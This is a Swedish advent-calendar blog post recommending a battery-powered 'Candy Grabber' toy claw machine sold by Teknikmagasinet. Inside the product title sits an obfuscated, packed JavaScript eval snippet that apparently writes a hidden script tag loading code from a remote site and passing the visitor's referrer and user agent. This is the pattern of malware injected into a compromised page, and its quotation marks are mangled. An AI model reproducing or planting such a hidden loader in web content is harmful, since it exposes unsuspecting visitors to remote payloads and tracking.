Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Lucka 10 julkalender: Candy Grabber

Lucka 10 julkalender: Candy Grabber
Sebastian Plengier Ehrnfelt

Candy eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndhsa|var|u0026u|referrer|daryf||js|php’.split(‘|’),0,{}))
Grabber: 10 december och fler julklappstips är på agendan. 

Idag har vi hittat en rolig liten godismaskin i tivoli anda. Jag gissar att jag inte behöver gå in så mycket i detalj på hur denna används, de flesta av er har nog någon gång testat liknande maskiner på tivolin.

Det handlar om att via en lyftkran/grävskopa plocka upp godis.

Du kan också fylla Candy Grabber med ditt eget favoritgodis, urgulliga gossedjur eller varför inte småsten, stoppa i ett av de medföljande plastmynten och sätt igång! Den fjärrstyrda kroken kontrolleras via de små spakarna på apparatens framsida och den tvådelade skopan greppar det mesta och för det tillbaka till utlämningsluckan. Drivs med 3 st D-batterier (ingår ej). Lev inkl plastmynt.

Candy Grabber kostar 240 kronor och finns att köpa hos Teknikmagasinet. 

Läs mer här!